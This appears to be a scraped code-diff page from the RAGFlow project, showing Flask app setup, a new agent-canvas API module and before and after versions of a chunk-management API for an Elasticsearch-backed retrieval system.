# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import sys
from importlib.util import module_from_spec, spec_from_file_location
from pathlib import Path
from flask import Blueprint, Flask
from werkzeug.wrappers.request import Request
from flask_cors import CORS

from api.db import StatusEnum
from api.db.db_models import close_connection
from api.db.services import UserService
from api.utils import CustomJSONEncoder

from flask_session import Session
from flask_login import LoginManager
from api.settings import SECRET_KEY, stat_logger
from api.settings import API_VERSION, access_logger
from api.utils.api_utils import server_error_response
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer

__all__ = ['app']


logger = logging.getLogger('flask.app')
for h in access_logger.handlers:
    logger.addHandler(h)

Request.json = property(lambda self: self.get_json(force=True, silent=True))

app = Flask(__name__)
CORS(app, supports_credentials=True, max_age=2592000)
app.url_map.strict_slashes = False
app.json_encoder = CustomJSONEncoder
app.errorhandler(Exception)(server_error_response)


## convenience for dev and debug
# app.config["LOGIN_DISABLED"] = True
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
app.config['MAX_CONTENT_LENGTH'] = int(os.environ.get("MAX_CONTENT_LENGTH", 128 * 1024 * 1024))

Session(app)
login_manager = LoginManager()
login_manager.init_app(app)


def search_pages_path(pages_dir):
    return [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]


def register_page(page_path):
    page_name = page_path.stem.rstrip('_app')
    module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name, ))

    spec = spec_from_file_location(module_name, page_path)
    page = module_from_spec(spec)
    page.app = app
    page.manager = Blueprint(page_name, module_name)
    sys.modules[module_name] = page
    spec.loader.exec_module(page)

    page_name = getattr(page, 'page_name', page_name)
    url_prefix = f'/{API_VERSION}/{page_name}'

    app.register_blueprint(page.manager, url_prefix=url_prefix)
    return url_prefix


pages_dir = [
    Path(__file__).parent,
    Path(__file__).parent.parent / 'api' / 'apps',
]

client_urls_prefix = [
    register_page(path)
    for dir in pages_dir
    for path in search_pages_path(dir)
]


@login_manager.request_loader
def load_user(web_request):
    jwt = Serializer(secret_key=SECRET_KEY)
    authorization = web_request.headers.get("Authorization")
    if authorization:
        try:
            access_token = str(jwt.loads(authorization))
            user = UserService.query(access_token=access_token, status=StatusEnum.VALID.value)
            if user:
                return user[0]
            else:
                return None
        except Exception as e:
            stat_logger.exception(e)
            return None
    else:
        return None


@app.teardown_request
def _db_close(exc):
    close_connection()
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import sys
from importlib.util import module_from_spec, spec_from_file_location
from pathlib import Path
from flask import Blueprint, Flask
from werkzeug.wrappers.request import Request
from flask_cors import CORS

from api.db import StatusEnum
from api.db.db_models import close_connection
from api.db.services import UserService
from api.utils import CustomJSONEncoder, commands

from flask_session import Session
from flask_login import LoginManager
from api.settings import SECRET_KEY, stat_logger
from api.settings import API_VERSION, access_logger
from api.utils.api_utils import server_error_response
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer

__all__ = ['app']


logger = logging.getLogger('flask.app')
for h in access_logger.handlers:
    logger.addHandler(h)

Request.json = property(lambda self: self.get_json(force=True, silent=True))

app = Flask(__name__)
CORS(app, supports_credentials=True, max_age=2592000)
app.url_map.strict_slashes = False
app.json_encoder = CustomJSONEncoder
app.errorhandler(Exception)(server_error_response)


## convenience for dev and debug
# app.config["LOGIN_DISABLED"] = True
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
app.config['MAX_CONTENT_LENGTH'] = int(os.environ.get("MAX_CONTENT_LENGTH", 128 * 1024 * 1024))

Session(app)
login_manager = LoginManager()
login_manager.init_app(app)

commands.register_commands(app)


def search_pages_path(pages_dir):
    app_path_list = [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
    api_path_list = [path for path in pages_dir.glob('*sdk/*.py') if not path.name.startswith('.')]
    app_path_list.extend(api_path_list)
    return app_path_list


def register_page(page_path):
    path = f'{page_path}'

    page_name = page_path.stem.rstrip('_app')
    module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name,))

    spec = spec_from_file_location(module_name, page_path)
    page = module_from_spec(spec)
    page.app = app
    page.manager = Blueprint(page_name, module_name)
    sys.modules[module_name] = page
    spec.loader.exec_module(page)
    page_name = getattr(page, 'page_name', page_name)
    url_prefix = f'/api/{API_VERSION}/{page_name}' if "/sdk/" in path else f'/{API_VERSION}/{page_name}'

    app.register_blueprint(page.manager, url_prefix=url_prefix)
    return url_prefix


pages_dir = [
    Path(__file__).parent,
    Path(__file__).parent.parent / 'api' / 'apps',
    Path(__file__).parent.parent / 'api' / 'apps' / 'sdk',
]

client_urls_prefix = [
    register_page(path)
    for dir in pages_dir
    for path in search_pages_path(dir)
]


@login_manager.request_loader
def load_user(web_request):
    jwt = Serializer(secret_key=SECRET_KEY)
    authorization = web_request.headers.get("Authorization")
    if authorization:
        try:
            access_token = str(jwt.loads(authorization))
            user = UserService.query(access_token=access_token, status=StatusEnum.VALID.value)
            if user:
                return user[0]
            else:
                return None
        except Exception as e:
            stat_logger.exception(e)
            return None
    else:
        return None


@app.teardown_request
def _db_close(exc):
    close_connection()
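The net effect of the updated register_page is that modules under an sdk directory are mounted with an extra /api segment in their URL prefix. The prefix rule in isolation (assuming API_VERSION is "v1", as configured in api/settings.py; the example paths are illustrative):

def url_prefix(path: str, page_name: str, api_version: str = "v1") -> str:
    # Mirrors the prefix logic in register_page above.
    if "/sdk/" in path:
        return f"/api/{api_version}/{page_name}"
    return f"/{api_version}/{page_name}"

print(url_prefix("api/apps/canvas_app.py", "canvas"))    # -> /v1/canvas
print(url_prefix("api/apps/sdk/dataset.py", "dataset"))  # -> /api/v1/dataset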
1181
api/apps/api_app.py
File diff suppressed because it is too large
197
api/apps/canvas_app.py
Normal file
@@ -0,0 +1,197 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
from functools import partial
|
||||
from flask import request, Response
|
||||
from flask_login import login_required, current_user
|
||||
from api.db.services.canvas_service import CanvasTemplateService, UserCanvasService
|
||||
from api.settings import RetCode
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result, server_error_response, validate_request, get_data_error_result
|
||||
from agent.canvas import Canvas
|
||||
from peewee import MySQLDatabase, PostgresqlDatabase
|
||||
|
||||
|
||||
@manager.route('/templates', methods=['GET'])
|
||||
@login_required
|
||||
def templates():
|
||||
return get_json_result(data=[c.to_dict() for c in CanvasTemplateService.get_all()])
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def canvas_list():
|
||||
return get_json_result(data=sorted([c.to_dict() for c in \
|
||||
UserCanvasService.query(user_id=current_user.id)], key=lambda x: x["update_time"]*-1)
|
||||
)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@validate_request("canvas_ids")
|
||||
@login_required
|
||||
def rm():
|
||||
for i in request.json["canvas_ids"]:
|
||||
if not UserCanvasService.query(user_id=current_user.id,id=i):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of canvas authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
UserCanvasService.delete_by_id(i)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@validate_request("dsl", "title")
|
||||
@login_required
|
||||
def save():
|
||||
req = request.json
|
||||
req["user_id"] = current_user.id
|
||||
if not isinstance(req["dsl"], str): req["dsl"] = json.dumps(req["dsl"], ensure_ascii=False)
|
||||
|
||||
req["dsl"] = json.loads(req["dsl"])
|
||||
if "id" not in req:
|
||||
if UserCanvasService.query(user_id=current_user.id, title=req["title"].strip()):
|
||||
return server_error_response(ValueError("Duplicated title."))
|
||||
req["id"] = get_uuid()
|
||||
if not UserCanvasService.save(**req):
|
||||
return get_data_error_result(retmsg="Fail to save canvas.")
|
||||
else:
|
||||
if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of canvas authorized for this operation.',
|
                retcode=RetCode.OPERATING_ERROR)
        UserCanvasService.update_by_id(req["id"], req)
    return get_json_result(data=req)


@manager.route('/get/<canvas_id>', methods=['GET'])
@login_required
def get(canvas_id):
    e, c = UserCanvasService.get_by_id(canvas_id)
    if not e:
        return get_data_error_result(retmsg="canvas not found.")
    return get_json_result(data=c.to_dict())


@manager.route('/completion', methods=['POST'])
@validate_request("id")
@login_required
def run():
    req = request.json
    stream = req.get("stream", True)
    e, cvs = UserCanvasService.get_by_id(req["id"])
    if not e:
        return get_data_error_result(retmsg="canvas not found.")
    if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
        return get_json_result(
            data=False, retmsg=f'Only owner of canvas authorized for this operation.',
            retcode=RetCode.OPERATING_ERROR)

    if not isinstance(cvs.dsl, str):
        cvs.dsl = json.dumps(cvs.dsl, ensure_ascii=False)

    final_ans = {"reference": [], "content": ""}
    message_id = req.get("message_id", get_uuid())
    try:
        canvas = Canvas(cvs.dsl, current_user.id)
        if "message" in req:
            canvas.messages.append({"role": "user", "content": req["message"], "id": message_id})
            canvas.add_user_input(req["message"])
        answer = canvas.run(stream=stream)
        print(canvas)
    except Exception as e:
        return server_error_response(e)

    assert answer is not None, "Nothing. Is it over?"

    if stream:
        assert isinstance(answer, partial), "Nothing. Is it over?"

        def sse():
            nonlocal answer, cvs
            try:
                for ans in answer():
                    for k in ans.keys():
                        final_ans[k] = ans[k]
                    ans = {"answer": ans["content"], "reference": ans.get("reference", [])}
                    yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"

                canvas.messages.append({"role": "assistant", "content": final_ans["content"], "id": message_id})
                if final_ans.get("reference"):
                    canvas.reference.append(final_ans["reference"])
                cvs.dsl = json.loads(str(canvas))
                UserCanvasService.update_by_id(req["id"], cvs.to_dict())
            except Exception as e:
                yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
                                            "data": {"answer": "**ERROR**: " + str(e), "reference": []}},
                                           ensure_ascii=False) + "\n\n"
            yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"

        resp = Response(sse(), mimetype="text/event-stream")
        resp.headers.add_header("Cache-control", "no-cache")
        resp.headers.add_header("Connection", "keep-alive")
        resp.headers.add_header("X-Accel-Buffering", "no")
        resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
        return resp

    final_ans["content"] = "\n".join(answer["content"]) if "content" in answer else ""
    canvas.messages.append({"role": "assistant", "content": final_ans["content"], "id": message_id})
    if final_ans.get("reference"):
        canvas.reference.append(final_ans["reference"])
    cvs.dsl = json.loads(str(canvas))
    UserCanvasService.update_by_id(req["id"], cvs.to_dict())
    return get_json_result(data={"answer": final_ans["content"], "reference": final_ans.get("reference", [])})

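The /completion endpoint above streams Server-Sent Events: one "data: {...}" frame per partial answer, then a final frame whose data field is the literal true. A minimal client sketch follows; the host, port, /v1/canvas URL prefix, the helper name stream_completion, and the pre-authenticated session are assumptions, not part of the source.

import json
import requests

session = requests.Session()  # assumed to already carry a logged-in cookie

def stream_completion(canvas_id, message):
    resp = session.post(
        "http://localhost:9380/v1/canvas/completion",  # URL prefix is an assumption
        json={"id": canvas_id, "message": message, "stream": True},
        stream=True)
    for line in resp.iter_lines(decode_unicode=True):
        if not line or not line.startswith("data:"):
            continue  # skip the blank separators between SSE frames
        payload = json.loads(line[len("data:"):])
        if payload["data"] is True:
            break  # final sentinel frame, the stream is complete
        if payload["retcode"] != 0:
            raise RuntimeError(payload["retmsg"])
        yield payload["data"]["answer"]

for partial_answer in stream_completion("<canvas-id>", "hello"):
    print(partial_answer)
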
@manager.route('/reset', methods=['POST'])
@validate_request("id")
@login_required
def reset():
    req = request.json
    try:
        e, user_canvas = UserCanvasService.get_by_id(req["id"])
        if not e:
            return get_data_error_result(retmsg="canvas not found.")
        if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
            return get_json_result(
                data=False, retmsg=f'Only owner of canvas authorized for this operation.',
                retcode=RetCode.OPERATING_ERROR)

        canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
        canvas.reset()
        req["dsl"] = json.loads(str(canvas))
        UserCanvasService.update_by_id(req["id"], {"dsl": req["dsl"]})
        return get_json_result(data=req["dsl"])
    except Exception as e:
        return server_error_response(e)


@manager.route('/test_db_connect', methods=['POST'])
@validate_request("db_type", "database", "username", "host", "port", "password")
@login_required
def test_db_connect():
    req = request.json
    try:
        if req["db_type"] in ["mysql", "mariadb"]:
            db = MySQLDatabase(req["database"], user=req["username"], host=req["host"], port=req["port"],
                               password=req["password"])
        elif req["db_type"] == 'postgresql':
            db = PostgresqlDatabase(req["database"], user=req["username"], host=req["host"], port=req["port"],
                                    password=req["password"])
        db.connect()
        db.close()
        return get_json_result(data="Database Connection Successful!")
    except Exception as e:
        return server_error_response(e)

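Note that test_db_connect only binds db inside its two branches; any other db_type reaches db.connect() with db unbound, and the resulting NameError is surfaced through the generic server_error_response handler. A hypothetical guard, not in the source, would fail fast instead:

# Hypothetical guard, not in the source: reject unsupported db_type values
# before touching the peewee database objects.
SUPPORTED_DB_TYPES = {"mysql", "mariadb", "postgresql"}

if req["db_type"] not in SUPPORTED_DB_TYPES:
    return get_json_result(data=False,
                           retmsg="Unsupported db_type: %s" % req["db_type"],
                           retcode=RetCode.DATA_ERROR)
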

@@ -1,268 +1,331 @@

(file before the change, 268 lines:)

#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime

from flask import request
from flask_login import login_required, current_user
from elasticsearch_dsl import Q

from rag.app.qa import rmPrefix, beAdoc
from rag.nlp import search, rag_tokenizer
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils import rmSpace
from api.db import LLMType, ParserType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import TenantLLMService
from api.db.services.user_service import UserTenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.db.services.document_service import DocumentService
from api.settings import RetCode, retrievaler
from api.utils.api_utils import get_json_result
import hashlib
import re


@manager.route('/list', methods=['POST'])
@login_required
@validate_request("doc_id")
def list_chunk():
    req = request.json
    doc_id = req["doc_id"]
    page = int(req.get("page", 1))
    size = int(req.get("size", 30))
    question = req.get("keywords", "")
    try:
        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")
        e, doc = DocumentService.get_by_id(doc_id)
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        query = {
            "doc_ids": [doc_id], "page": page, "size": size, "question": question, "sort": True
        }
        if "available_int" in req:
            query["available_int"] = int(req["available_int"])
        sres = retrievaler.search(query, search.index_name(tenant_id))
        res = {"total": sres.total, "chunks": [], "doc": doc.to_dict()}
        for id in sres.ids:
            d = {
                "chunk_id": id,
                "content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[id].get(
                    "content_with_weight", ""),
                "doc_id": sres.field[id]["doc_id"],
                "docnm_kwd": sres.field[id]["docnm_kwd"],
                "important_kwd": sres.field[id].get("important_kwd", []),
                "img_id": sres.field[id].get("img_id", ""),
                "available_int": sres.field[id].get("available_int", 1),
                "positions": sres.field[id].get("position_int", "").split("\t")
            }
            if len(d["positions"]) % 5 == 0:
                poss = []
                for i in range(0, len(d["positions"]), 5):
                    poss.append([float(d["positions"][i]), float(d["positions"][i + 1]), float(d["positions"][i + 2]),
                                 float(d["positions"][i + 3]), float(d["positions"][i + 4])])
                d["positions"] = poss
            res["chunks"].append(d)
        return get_json_result(data=res)
    except Exception as e:
        if str(e).find("not_found") > 0:
            return get_json_result(data=False, retmsg=f'No chunk found!',
                                   retcode=RetCode.DATA_ERROR)
        return server_error_response(e)


@manager.route('/get', methods=['GET'])
@login_required
def get():
    chunk_id = request.args["chunk_id"]
    try:
        tenants = UserTenantService.query(user_id=current_user.id)
        if not tenants:
            return get_data_error_result(retmsg="Tenant not found!")
        res = ELASTICSEARCH.get(
            chunk_id, search.index_name(
                tenants[0].tenant_id))
        if not res.get("found"):
            return server_error_response("Chunk not found")
        id = res["_id"]
        res = res["_source"]
        res["chunk_id"] = id
        k = []
        for n in res.keys():
            if re.search(r"(_vec$|_sm_|_tks|_ltks)", n):
                k.append(n)
        for n in k:
            del res[n]

        return get_json_result(data=res)
    except Exception as e:
        if str(e).find("NotFoundError") >= 0:
            return get_json_result(data=False, retmsg=f'Chunk not found!',
                                   retcode=RetCode.DATA_ERROR)
        return server_error_response(e)


@manager.route('/set', methods=['POST'])
@login_required
@validate_request("doc_id", "chunk_id", "content_with_weight",
                  "important_kwd")
def set():
    req = request.json
    d = {
        "id": req["chunk_id"],
        "content_with_weight": req["content_with_weight"]}
    d["content_ltks"] = rag_tokenizer.tokenize(req["content_with_weight"])
    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
    d["important_kwd"] = req["important_kwd"]
    d["important_tks"] = rag_tokenizer.tokenize(" ".join(req["important_kwd"]))
    if "available_int" in req:
        d["available_int"] = req["available_int"]

    try:
        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")
        embd_mdl = TenantLLMService.model_instance(
            tenant_id, LLMType.EMBEDDING.value)
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")

        if doc.parser_id == ParserType.QA:
            arr = [
                t for t in re.split(
                    r"[\n\t]",
                    req["content_with_weight"]) if len(t) > 1]
            if len(arr) != 2:
                return get_data_error_result(
                    retmsg="Q&A must be separated by TAB/ENTER key.")
            q, a = rmPrefix(arr[0]), rmPrefix[arr[1]]
            d = beAdoc(d, arr[0], arr[1], not any(
                [rag_tokenizer.is_chinese(t) for t in q + a]))

        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
        v = 0.1 * v[0] + 0.9 * v[1] if doc.parser_id != ParserType.QA else v[1]
        d["q_%d_vec" % len(v)] = v.tolist()
        ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/switch', methods=['POST'])
@login_required
@validate_request("chunk_ids", "available_int", "doc_id")
def switch():
    req = request.json
    try:
        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")
        if not ELASTICSEARCH.upsert([{"id": i, "available_int": int(req["available_int"])} for i in req["chunk_ids"]],
                                    search.index_name(tenant_id)):
            return get_data_error_result(retmsg="Index updating failure")
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("chunk_ids")
def rm():
    req = request.json
    try:
        if not ELASTICSEARCH.deleteByQuery(
                Q("ids", values=req["chunk_ids"]), search.index_name(current_user.id)):
            return get_data_error_result(retmsg="Index updating failure")
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/create', methods=['POST'])
@login_required
@validate_request("doc_id", "content_with_weight")
def create():
    req = request.json
    md5 = hashlib.md5()
    md5.update((req["content_with_weight"] + req["doc_id"]).encode("utf-8"))
    chunck_id = md5.hexdigest()
    d = {"id": chunck_id, "content_ltks": rag_tokenizer.tokenize(req["content_with_weight"]),
         "content_with_weight": req["content_with_weight"]}
    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
    d["important_kwd"] = req.get("important_kwd", [])
    d["important_tks"] = rag_tokenizer.tokenize(" ".join(req.get("important_kwd", [])))
    d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
    d["create_timestamp_flt"] = datetime.datetime.now().timestamp()

    try:
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        d["kb_id"] = [doc.kb_id]
        d["docnm_kwd"] = doc.name
        d["doc_id"] = doc.id

        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")

        embd_mdl = TenantLLMService.model_instance(
            tenant_id, LLMType.EMBEDDING.value)
        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
        DocumentService.increment_chunk_num(req["doc_id"], doc.kb_id, c, 1, 0)
        v = 0.1 * v[0] + 0.9 * v[1]
        d["q_%d_vec" % len(v)] = v.tolist()
        ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
        return get_json_result(data={"chunk_id": chunck_id})
    except Exception as e:
        return server_error_response(e)


@manager.route('/retrieval_test', methods=['POST'])
@login_required
@validate_request("kb_id", "question")
def retrieval_test():
    req = request.json
    page = int(req.get("page", 1))
    size = int(req.get("size", 30))
    question = req["question"]
    kb_id = req["kb_id"]
    doc_ids = req.get("doc_ids", [])
    similarity_threshold = float(req.get("similarity_threshold", 0.2))
    vector_similarity_weight = float(req.get("vector_similarity_weight", 0.3))
    top = int(req.get("top_k", 1024))
    try:
        e, kb = KnowledgebaseService.get_by_id(kb_id)
        if not e:
            return get_data_error_result(retmsg="Knowledgebase not found!")

        embd_mdl = TenantLLMService.model_instance(
            kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
        ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size, similarity_threshold,
                                      vector_similarity_weight, top, doc_ids)
        for c in ranks["chunks"]:
            if "vector" in c:
                del c["vector"]

        return get_json_result(data=ranks)
    except Exception as e:
        if str(e).find("not_found") > 0:
            return get_json_result(data=False, retmsg=f'No chunk found! Check the chunk status please!',
                                   retcode=RetCode.DATA_ERROR)
        return server_error_response(e)

(file after the change, 331 lines:)

#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import json
import traceback

from flask import request
from flask_login import login_required, current_user
from elasticsearch_dsl import Q

from rag.app.qa import rmPrefix, beAdoc
from rag.nlp import search, rag_tokenizer, keyword_extraction
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils import rmSpace
from api.db import LLMType, ParserType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import TenantLLMService
from api.db.services.user_service import UserTenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.db.services.document_service import DocumentService
from api.settings import RetCode, retrievaler, kg_retrievaler
from api.utils.api_utils import get_json_result
import hashlib
import re


@manager.route('/list', methods=['POST'])
@login_required
@validate_request("doc_id")
def list_chunk():
    req = request.json
    doc_id = req["doc_id"]
    page = int(req.get("page", 1))
    size = int(req.get("size", 30))
    question = req.get("keywords", "")
    try:
        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")
        e, doc = DocumentService.get_by_id(doc_id)
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        query = {
            "doc_ids": [doc_id], "page": page, "size": size, "question": question, "sort": True
        }
        if "available_int" in req:
            query["available_int"] = int(req["available_int"])
        sres = retrievaler.search(query, search.index_name(tenant_id), highlight=True)
        res = {"total": sres.total, "chunks": [], "doc": doc.to_dict()}
        for id in sres.ids:
            d = {
                "chunk_id": id,
                "content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[id].get(
                    "content_with_weight", ""),
                "doc_id": sres.field[id]["doc_id"],
                "docnm_kwd": sres.field[id]["docnm_kwd"],
                "important_kwd": sres.field[id].get("important_kwd", []),
                "img_id": sres.field[id].get("img_id", ""),
                "available_int": sres.field[id].get("available_int", 1),
                "positions": sres.field[id].get("position_int", "").split("\t")
            }
            if len(d["positions"]) % 5 == 0:
                poss = []
                for i in range(0, len(d["positions"]), 5):
                    poss.append([float(d["positions"][i]), float(d["positions"][i + 1]), float(d["positions"][i + 2]),
                                 float(d["positions"][i + 3]), float(d["positions"][i + 4])])
                d["positions"] = poss
            res["chunks"].append(d)
        return get_json_result(data=res)
    except Exception as e:
        if str(e).find("not_found") > 0:
            return get_json_result(data=False, retmsg=f'No chunk found!',
                                   retcode=RetCode.DATA_ERROR)
        return server_error_response(e)

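Each chunk's position_int field is a tab-separated string whose values come in groups of five, one page number plus a bounding box per fragment, which is why list_chunk only regroups the values when the count divides evenly by 5. A standalone sketch of that regrouping; the (page, left, right, top, bottom) reading of the quintuple is an assumption about the layout parser's convention:

# Hedged sketch: regroup the flat tab-separated position string into 5-tuples.
def parse_positions(position_int):
    vals = [float(x) for x in position_int.split("\t") if x]
    if len(vals) % 5 != 0:
        return []  # malformed; the endpoint keeps the raw strings in this case
    return [vals[i:i + 5] for i in range(0, len(vals), 5)]

assert parse_positions("1\t10\t200\t30\t60") == [[1.0, 10.0, 200.0, 30.0, 60.0]]
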
@manager.route('/get', methods=['GET'])
@login_required
def get():
    chunk_id = request.args["chunk_id"]
    try:
        tenants = UserTenantService.query(user_id=current_user.id)
        if not tenants:
            return get_data_error_result(retmsg="Tenant not found!")
        res = ELASTICSEARCH.get(
            chunk_id, search.index_name(
                tenants[0].tenant_id))
        if not res.get("found"):
            return server_error_response("Chunk not found")
        id = res["_id"]
        res = res["_source"]
        res["chunk_id"] = id
        k = []
        for n in res.keys():
            if re.search(r"(_vec$|_sm_|_tks|_ltks)", n):
                k.append(n)
        for n in k:
            del res[n]

        return get_json_result(data=res)
    except Exception as e:
        if str(e).find("NotFoundError") >= 0:
            return get_json_result(data=False, retmsg=f'Chunk not found!',
                                   retcode=RetCode.DATA_ERROR)
        return server_error_response(e)


@manager.route('/set', methods=['POST'])
@login_required
@validate_request("doc_id", "chunk_id", "content_with_weight",
                  "important_kwd")
def set():
    req = request.json
    d = {
        "id": req["chunk_id"],
        "content_with_weight": req["content_with_weight"]}
    d["content_ltks"] = rag_tokenizer.tokenize(req["content_with_weight"])
    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
    d["important_kwd"] = req["important_kwd"]
    d["important_tks"] = rag_tokenizer.tokenize(" ".join(req["important_kwd"]))
    if "available_int" in req:
        d["available_int"] = req["available_int"]

    try:
        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")

        embd_id = DocumentService.get_embd_id(req["doc_id"])
        embd_mdl = TenantLLMService.model_instance(
            tenant_id, LLMType.EMBEDDING.value, embd_id)

        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")

        if doc.parser_id == ParserType.QA:
            arr = [
                t for t in re.split(
                    r"[\n\t]",
                    req["content_with_weight"]) if len(t) > 1]
            if len(arr) != 2:
                return get_data_error_result(
                    retmsg="Q&A must be separated by TAB/ENTER key.")
            q, a = rmPrefix(arr[0]), rmPrefix(arr[1])
            d = beAdoc(d, arr[0], arr[1], not any(
                [rag_tokenizer.is_chinese(t) for t in q + a]))

        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
        v = 0.1 * v[0] + 0.9 * v[1] if doc.parser_id != ParserType.QA else v[1]
        d["q_%d_vec" % len(v)] = v.tolist()
        ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)

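In set(), the stored vector blends the document-title embedding with the chunk-content embedding at a 1:9 ratio, except for Q&A chunks, where only the content vector is kept. A tiny numpy illustration of the blend; the vectors are made up:

import numpy as np

# v[0] embeds the document title, v[1] the chunk body (made-up 2-d vectors).
v = np.array([[1.0, 0.0],
              [0.0, 1.0]])
blended = 0.1 * v[0] + 0.9 * v[1]
print(blended)  # [0.1 0.9], stored under the dimension-keyed "q_%d_vec" field
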
@manager.route('/switch', methods=['POST'])
@login_required
@validate_request("chunk_ids", "available_int", "doc_id")
def switch():
    req = request.json
    try:
        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")
